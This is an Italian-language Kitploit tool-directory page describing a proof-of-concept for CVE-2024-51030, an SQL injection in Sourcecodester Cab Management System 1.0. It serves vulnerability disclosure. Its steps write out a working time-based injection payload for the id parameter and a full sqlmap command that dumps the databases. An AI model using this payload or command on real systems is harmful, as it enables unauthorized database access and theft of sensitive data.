Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-51030 — Proof-of-concept exploit per SQL injection in Sourcecodester Cab Management System 1.0, che dimostra l'esecuzione arbitraria di SQL tramite il parametro id in manage_client.php e view_cab.php. | Kitploit
Strumenti/GitHubGitHub/vighneshnair7/cve-2024-51030
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

Proof-of-concept exploit per SQL injection in Sourcecodester Cab Management System 1.0, che dimostra l'esecuzione arbitraria di SQL tramite il parametro id in manage_client.php e view_cab.php.

Vedi Repository
121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-51030

Descrizione

Una vulnerabilità di SQL injection in manage_client.php e view_cab.php di Sourcecodester Cab Management System 1.0 consente a un attaccante remoto di eseguire comandi SQL arbitrari tramite il parametro id, portando ad accessi non autorizzati e potenziale compromissione di dati sensibili all'interno del database.

Tipo di vulnerabilità

SQL Injection

Fornitore del prodotto

Sourcecodester

Base del codice del prodotto affetto:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

Componente affetto:

Il Sourcecodester Cab Management System v1.0 è vulnerabile a SQL injection attraverso il parametro id nelle pagine manage_client.php e view_cab.php.

Vettori d'attacco:

  • Configurare l'applicazione in locale e accedere utilizzando le credenziali di admin predefinite fornite, oppure è possibile accedere come utente admin con privilegi ridotti (es. staff).
  • Ora, navigare al seguente URL nel browser: http://localhost/cms/admin/?page=clients/manage_client&id=1
  • Iniettare il payload SQL: Modificare il parametro id nell'URL per includere un payload di SQL injection basato su booleano o basato sul tempo: http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  • Osservare la risposta dell'applicazione: La pagina dovrebbe impiegare sensibilmente più tempo (5 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro id è vulnerabile a SQL injection.
  • Ora utilizzare lo strumento SQLMap per ulteriori sfruttamenti e dump dei database con il seguente comando: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
  • Riferimenti:

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    Scarica lo strumento